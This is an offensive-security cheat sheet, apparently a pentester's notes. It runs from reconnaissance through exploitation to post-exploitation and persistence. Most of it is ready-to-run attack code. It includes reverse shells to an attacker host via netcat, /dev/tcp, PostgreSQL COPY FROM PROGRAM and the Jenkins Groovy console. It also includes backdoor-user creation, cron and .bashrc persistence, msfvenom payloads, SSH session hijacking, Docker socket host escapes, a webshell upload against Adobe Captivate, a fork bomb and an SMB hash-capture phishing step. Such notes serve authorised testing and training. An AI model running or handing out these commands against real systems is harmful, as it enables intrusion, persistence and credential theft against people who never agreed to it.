Recon
DNS Recon
https://github.com/aboul3la/Sublist3r
https://github.com/mschwager/fierce
Aquatone
https://github.com/michenriksen/aquatone
Start with discovery:
aquatone-discover --domain <target> --threads 25
Next run the scanning phase:
aquatone-scan --domain <target> --threads 25
Finish with gathering:
aquatone-gather --domain <target> --threads 25
Gathering on OSX:
Xvfb & aquatone-gather --domain <target> --threads 25
https://github.com/jhaddix/domain
Eyewitness
Single target as command line arg
Run from docker container, output results to ~/EyeWitness/results:
docker run --rm -it -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -v ~/EyeWitness:/tmp/EyeWitness eyewitness --single http://www.google.com --headless
Read targets out of a file
- Put your targets in
~/EyeWitness/urls.txt - Run the following command:
docker run --rm -it -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -v ~/eyewitness:/tmp/EyeWitness eyewitness -f /tmp/EyeWitness/urls.txt --headless
- The Results will be in
~/EyeWitness/results.
Nmap
Host discovery
nmap -sP -oA onlineHosts <ip range>/<subnet mask>
Detailed scan
nmap -T4 -A -v -oA detailedScanResults <ip range>/subnet<mask>
-T4: Aggressive
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity of output
Single host TCP scan:
nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA <output filename> <target>
Detailed single host TCP scan:
nmap -nvv -Pn -sSV -T1 -p$(cat <file from single host tcp scan>.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA <output filename DETAILED> <target>
Single host UDP scan:
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA <output filename> <target>
Scan all 65535 ports
-p-
Responder
Responder can be a great tool to collect password hashes, and give you a starting point for gaining access to a system on the network.
Here's one such scenario:
https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html
Exploitation
Reverse shell in Scala:
import sys.process._
"nc -e /bin/sh evil.com 8080" !!;
Once you have the shell, run the following for a full fledged shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Very helpful resource for testing: https://www.tutorialspoint.com/compile_scala_online.php
Post Exploitation
Linux
Access a user's env
This is incredibly useful when you find that users are storing credentials in their environment variables.
sudo su - <username>
env
Search for config files which may have cleartext passwords in them:
# This command works on linux and OSX
du -a $directory | awk '{print $2}' | grep '\.conf$'
Netcat reverse shell without -e
Create listener:
nc -lvp [port]
On the victim:
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc [attacker] [port] 1>/tmp/backpipe
Resource: https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/
Transfer file via netcat
On host to receive file:
nc -lvp [some port] > .evil.file
On host to send file
nc -w 3 [host receiving file] [some port] < evil.file
If the file is a reverse shell be sure to make it an executable on the system:
chmod +x .evil.file
Resource: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
Introduce backdoor user
# Create evil user
useradd evil -s /bin/bash -m
# Change evil user's password
echo -e "evilpass\nevilpass" | passwd evil
# Add evil user to sudoers
echo 'evil ALL=(ALL:ALL) ALL' >> /etc/sudoers
# Give evil user ssh access
echo -e "PasswordAuthentication yes\nAllowUsers evil" >> /etc/ssh/sshd_config
To delete the backdoored user:
# Delete evil user
userdel evil
# Delete evil user from sudoers
sed -i '/evil ALL=(ALL:ALL) ALL/d' /etc/sudoers
# Delete evil user from ssh access
sed -i '/^PasswordAuthentication yes/d' /etc/ssh/sshd_config && sed -i '/^AllowUsers evil/d' /etc/ssh/sshd_config
Unix-privesc-check
Find misconfigurations, files with open permissions, etc.
Video Reference
Download it:
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O /tmp/upc.sh
-or-
Download and run privesc-check.sh, save output to a file, and clean up (standard):
wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz && cd /tmp && tar -xvf unix-privesc-check-1.4.tar.gz && bash /tmp/unix-privesc-check-1.4/unix-privesc-check standard | tee /tmp/output2.txt && rm /tmp/unix-privesc-check-1.4.tar.gz && rm -rf /tmp/unix-privesc-check-1.4
-or-
Download and run privesc-check.sh, save output to a file, and clean up (detailed):
wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz && cd /tmp && tar -xvf unix-privesc-check-1.4.tar.gz && bash /tmp/unix-privesc-check-1.4/unix-privesc-check detailed | tee /tmp/output2.txt && rm /tmp/unix-privesc-check-1.4.tar.gz && rm -rf /tmp/unix-privesc-check-1.4
LinEnum
Another good one to find misconfigurations, files with open permissions, etc.
Download it:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/linenum.sh
-or-
Download and run linenum, save output to a file:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/linenum.sh && bash /tmp/linenum.sh | tee /tmp/output.txt
Linuxprivchecker
Download and run linuxprivchecker.py, save output to a file:
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py -O /tmp/lpc.py && python /tmp/lpc.py | tee /tmp/output1.txt
If there are services running as privileged user, try to find existing exploits.
Good linux post exploitation resource
https://www.youtube.com/watch?v=oYHAi0cgur4
Who has logged in previously?
who, w, last
Are you in the sudoers file?
sudo -l, cat /etc/sudoers
Get network information, like open ports and their associated processes:
netstat -antup
lsof -i
Find programs with root privs:
find / -perm -04000 > programsWithRootAccess.txt
Screenshot the targets screen when you're ssh'ed into a system:
DISPLAY=:0 import -window root screenshot.jpg
Resource: https://github.com/jmatt-io/ANL-CDC/blob/master/ubuntu_ftp_secure.sh
SUID Executables
Look for SUID files:
find / -perm -u=s -type f 2>/dev/null
https://pentestlab.blog/tag/privilege-escalation/
Cracking hashes
Identify what type of hash it is with Hash ID. Once you've done this, crack it with hashcat, john, etc.
For cracking hashes in /etc/shadow
https://www.cyberciti.biz/faq/understanding-etcshadow-file/
Resource: https://www.youtube.com/watch?v=CuBX3sBeGSw
Lateral Movement
Hijacking SSH with Master Mode
Copy this into ~/.ssh/config for a given compromised user:
Host *
ControlMaster auto
ControlPath ~/.ssh/sockets/ssh-%r@%h:%p
ControlPersist yes
Also run this command:
mkdir ~/.ssh/sockets
Now you simply need to wait for the compromised user to ssh to another host. Once this happens, you should be able to ssh to that system without a password as that user.
Resources
Docker
If you find port 2375 open on a system:
docker -H tcp://<ip of target>:2375 <docker command>
For example, to list the containers on that system:
docker -H tcp://<ip of target>:2375 ps -a
To connect to an existing container:
docker -H tcp://<ip of target>:2375 exec -it <target container> /bin/bash
To create and run a container with the host's root volume mounted:
docker -H tcp://<ip of target>:2375 run --rm -it -v /:/host ubuntu:latest chroot /host /bin/bash
To avoid having to load up a new image (assuming ubuntu:latest isn't already installed), use docker -H tcp://<ip of target>:2375 image ls to find an existing image to use.
To create a vulnerable example:
docker run -it --name=really_freaking_vulnerable_ubuntu -v /var/run/docker.sock:/var/run/docker.sock ubuntu
If you land on a container as root and you have write access to the docker socket:
# Check if you have write access:
ls -lart /var/run/docker.sock
srw-rw---- 1 root root 0 May 6 05:25 /var/run/docker.sock
Install docker:
# Ubuntu or Debian
apt update && apt install -y wget && wget -qO- https://get.docker.com | sh
Once that's installed, find an image to use with docker images, or use something simple like ubuntu:latest:
docker run -it -v /:/host <docker image to use> chroot /host /bin/bash
Alternatively, you can use the docker socket to avoid installing docker:
# Get images
curl --unix-socket /var/run/docker.sock http://docker/images/json
# Get containers
curl --unix-socket /var/run/docker.sock http://docker/containers/json
Proof of concept for exploitation: https://gitlab.com/Creased/docker-shadow/tree/master
However, this will still need to be done as the root user.
Resources
https://gitlab.com/Creased/vulnhub-docker-writeup
https://www.lvh.io/posts/dont-expose-the-docker-socket-not-even-to-a-container.html
https://www.youtube.com/watch?v=GeEW-e4LaT4&list=PLbZzXF2qC3RuL2K7KQVHe0aqdXbZC9Lnz&index=4
https://forums.docker.com/t/api-via-socket-returns-page-not-found/24682/5
Miscellaneous
Test out of bound code execution with tcpdump
Use this:
tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo -vv
in conjuction with a ping command.
Enable ssh on Kali
In /etc/ssh/sshd_config change PermitRootLogin without-password to PermitRootLogin yes
Resource: https://www.drchaos.com/enable-ssh-on-kali-linux-enable-ssh-on-kali-linux/
Command line vnc viewer on kali
vncviewer [target]::[vnc port]
Crash system as normal user with fork bomb
forkbomb(){ forkbomb | forkbomb & }; forkbomb
Resource: https://linuxconfig.org/how-to-crash-your-linux-system-with-fork-bomb
Brute force basic auth page with Hydra
hydra -V -L <list with usernames to try> -P <list with passwords to try> <target site> http-get /<path to page with auth>
Getting a shell on a PostgreSQL DB running on Linux if you have the proper access and permissions
Start by setting up a listener:
nc -lvp 8080
Connect to the postgresql DB:
psql -h <ip with db> -U <db username>
Review the access your user has with the \du command. Alternatively, you can go in blind and run a quick test (or run a test after you've established you have the proper access and permissions to do so):
CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'pwd'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;
This should give you the working directory the database is running on if all went well.
Next, get your reverse shell loaded up:
CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'echo "bash -i >& /dev/tcp/<attack machines ip address>/8080 0>&1" >> /tmp/unfriendly.sh'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;
Execute it:
CREATE OR REPLACE FUNCTION exec() RETURNS text AS $BODY$ BEGIN DROP TABLE IF EXISTS bDGhLsYPcd; CREATE TEMP TABLE bDGhLsYPcd (INPUT TEXT); COPY bDGhLsYPcd FROM PROGRAM 'bash /tmp/unfriendly.sh'; RETURN NULL; END; $BODY$ LANGUAGE plpgsql; SELECT * FROM exec(); SELECT * FROM bDGhLsYPcd;
You should have your shell.
Getting around "su: must be run from a terminal"
python -c 'import pty;pty.spawn("/bin/bash")'
Getting a shell on a Jenkins box running on Linux or OS X with access to the groovy console
Start by setting up a listener:
nc -lvp 8080
Set up a webserver using nginx, XAMPP, etc. and host a payload that could look something like this:
bash -i >& /dev/tcp/<attackers ip>/8080 0>&1
Download your reverse shell payload:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "curl http://<attackers ip>/unfriendly.sh --output /tmp/shell".execute()
# You could also use wget
# def proc = "wget http://<attackers ip>/unfriendly.sh -O /tmp/shell".execute()
# Use --proxy=off with wget if your proxy is messing with your ability to get that code
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Make sure your payload is on the target system:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "ls /tmp".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Run the payload:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "bash /tmp/shell".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
You should have your shell.
Metasploit
Run exploit in the background:
exploit -j
Do not interact with a session after successful exploitation of a target:
exploit -z
You can combine them:
exploit -j -z
Persist listener if a meterpreter session dies:
set ExitOnSession false
MSFVenom
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
To persist the file once you've uploaded it to your target in ~/.bashrc:
echo "~/.evil.file &" >> ~/.bashrc
For good measure, throw up a cronjob for every 5 minutes as well:
# write out current crontab
crontab -l > mycron
# echo new cron into cron file
echo "*/5 * * * * ~/.evil.file" >> mycron
# install new cron file
crontab mycron
rm mycron
Create and run listener
Create linux_rev.rc file:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [listener ip]
set ExitOnSession false
exploit -j -z
Run it:
msfconsole -r linux_rev.rc
64-bit exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -f exe -o evil.exe
exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=445 -f exe -o friendly.exe
exe-service
Useful when you need a running service, like for unquoted service path vulnerabilities.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=445 -f exe-service -o friendly.exe
PHP Reverse shell payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -e php/base64 -f raw > evil_file.php && sed -i '1s/^/<?php\n/' evil_file.php && sed -i -e '$a\?>' evil_file.php
PHP bind payload
msfvenom -p php/meterpreter/bind_tcp LPORT=4444 > msf_bind_shell.php
After starting the listener, upload the php code to the target server. Be sure to replace the /*<?php /**/ with <?php at the top of the file, and replace the % at the end of the file with ?>.
Once the file is uploaded, open the file on the target server. Follow this with an exploit in metasploit.
Evil encoded x64 aspx shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local host ip> LPORT=4444 -e x64/xor -f aspx > shell64.aspx
Jar reverse shell
msfvenom -p java/meterpreter/reverse_tcp LHOST=<local host ip> -f raw -o /tmp/java.jar
Start listener:
msfconsole
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <local host ip>
set ExitOnSession false
exploit -j -z
Resources
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://hackernoon.com/reverse-shell-cf154dfee6bd
Powershell payload
msfvenom -p cmd/windows/reverse_powershell LHOST=<local host ip> LPORT=445 -o friendly.bat
Start listener:
msfconsole
use exploit/multi/handler
set PAYLOAD cmd/windows/reverse_powershell
set LHOST <local host ip>
set LPORT 445
set ExitOnSession false
exploit -j -z
Copy the evil code:
# On the linux machine
cat friendly.bat
Start powershell on victim:
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
Paste the evil code into the powershell terminal, or create a .bat file and run it.
Bash Reverse shell
exec 5<>/dev/tcp/<evil ip>/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
Another similar option:
exec 5<>/dev/tcp/<evil ip>/4444;while read line 0<&5; do $line 2>&5 >&5; done
Basic:
bash -i >& /dev/tcp/<evil ip>/4444 0>&1
Netcat reverse shell
On evil server: nc -lvp <port>
On victim: nc <evil server> <port> -e sh &
Resource: docker start -ai
Create RC Listener
You can create an rc file so you don't need to type the commands into msfconsole every time to interact with your payload.
Create the file:
touch listener.rc
In listener.rc:
use exploit/multi/handler
set payload <payload>
set LHOST <host running metasploit>
set LPORT <port>
exploit -j -z
Run the rc file:
msfconsole -r listener.rc
Capture NTLM Hash with Metasploit
Start the smb capture server:
use auxiliary/server/capture/smb
run
Get victim to connect via smb.
If they need help via phish and they're on a mac, have them open Finder, Command+k, and then type in the following:
smb://<evil server ip>
Making Firefox horribly insecure for quick and dirty proof of concepts
- Browse to
about:config - Type in security.file
- Double click
security.fileuri.strict_origin_policy
This will disable the same origin policy blocks.
- Browse to
about:config - Type in security.file
- Double click
security.insecure_field_warning.contextual.enabled
This will disable the "this connection is not secure" messages.
- Browse to
about:config - Type in mixed
- Double click
security.mixed_content.block_active_content
This will disable the block active content lock.
Obviously you want to undo these changes once you've finished your POC's.
Find logs on a linux system
find . -type f -name "*.log"
Adobe Captivate Quiz Reporting Feature 'internalServerReporting.php' File Upload RCE Webshell
Using Burp, intercept a GET request to the target and throw it into repeater. Next, right click and Change request method to POST.
Here's what the request should look like:
POST /internalServerReporting.php HTTP/1.1
Host: <target running adobe captivate>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, sdch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
CompanyName=.&DepartmentName=.&CourseName=.&Filename=test.php&Filedata=<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd =($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Once you've sent it and gotten a 200 back, you can access the web shell like so:
http://<target running adobe captivate>/CaptivateResults/test.php?cmd=<your command to run>
Don't forget to clean it up when you're done:
http://<target running adobe captivate>/CaptivateResults/test.php?cmd=del test.php
With Metasploit:
https://hydrasky.com/network-security/create-a-web-backdoor-payload-with-metasploit/
Create the payload:
msfvenom -p php/meterpreter/bind_tcp LPORT=4000 > backdoor.php
In php_listener.rc:
use exploit/multi/handler
set payload <payload>
set LHOST <host running metasploit>
set LPORT 4444
Run the rc file:
msfconsole -r php_listener.rc
Upload the php code to the target server. I made sure to replace the /*<?php /**/ with <?php at the top of the file, and replaced the % at the end of the file with a ?> before doing so with Burp repeater.
Once the file is uploaded, open the file on the target server. Follow this with an exploit in metasploit.
You should have a shell at this point.
Maybe give this a shot https://dl.packetstormsecurity.net/papers/attack/root3.pdf
Windows Post Exploitation Techniques
A couple of things to try below.
# whoami
echo %USERDOMAIN%\%USERNAME%
# create user && add to Administrators
net user <username> <password> /ADD
net localgroup Administrators <username> /ADD
# list local admins
net localgroup administrators
# Look for passwords in txt, xml && xls files
findstr /si password *.txt| *.xml| *.xls
# Show open ports
netstat -bano
# Get list of domain admins
net group "Domain Admins" /domain
Enumerate missing patches on a windows machine with msf
post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester
Check for weak service permissions with accesschk (part of sysinternals)
Information on how to download sysinternals using powershell can be found here.
accesschk.exe -qwcu "Authenticated Users" * /accepteula
accesschk.exe -qwcu "Users" * /accepteula
accesschk.exe -qwcu "Everyone" * /accepteula
Once one has been found, modify the binpath to point to the net user bin to create a rogue user:
sc config <vuln service> binpath= "net user <username> <password> /add"
Restart it:
sc start <vuln service>
Add that user to the administrators group:
sc config <vuln service> binpath= "net localgroup administrators <username> /add"
Restart it again:
sc start <vuln service>
Check for weak file permissions with accesschk (part of sysinternals)
Information on how to download sysinternals using powershell can be found here.
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
Always install elevated privilege escalation
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Use metasploit if they set to exploit:
use exploit/windows/local/always_install_elevated
set LPORT 443
exploit
Use sessiongopher to find saved session info for RAT's
Grab it:
(New-Object System.Net.WebClient).DownloadFile("https://github.com/fireeye/SessionGopher/blob/master/SessionGopher.ps1","C:\Temp\SessionGopher.ps1")
Run it:
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough
Ghetto Windows WGET using cmd
bitsadmin /transfer myDownloadJob /download /priority normal http://<evil server>/evil.exe c:\temp\evil.exe
Upload stuff to a Windows machine via RDP
http://haacked.com/archive/2010/05/18/remote-desktop-file-copy.aspx/
Empire
Launch the docker container:
# Create a volume to store empire data in
docker create -v /opt/Empire --name data empireproject/empire
# Run the empire container
docker run -ti --volumes-from data -p <host ip>:80:80 empireproject/empire
Resource: http://blog.obscuritylabs.com/docker-command-controll-c2/
Create a listener:
listeners
uselistener http
Resource: http://ethicalhackingblog.com/hacking-powershell-empire-2-0/
POC creation
Coldfusion resources
https://nets.ec/Coldfusion_hacking
http://breenmachine.blogspot.com/2013/03/cool-coldfusion-post-exploitation.html
https://github.com/reider-roque/pentest-tools/blob/master/shells/webshell.cfm
Resources
https://netsec.ws/?p=331
https://trustfoundry.net/practical-guide-to-exploiting-the-unquoted-service-path-vulnerability-in-windows/
https://www.gracefulsecurity.com/privesc-unquoted-service-path/
https://www.youtube.com/watch?v=PC_iMqiuIRQ
http://thepcn3rd.blogspot.com/2015/03/utilizing-powerupps1-to-escalate.html
https://twitter.com/1njected/status/875701296325697536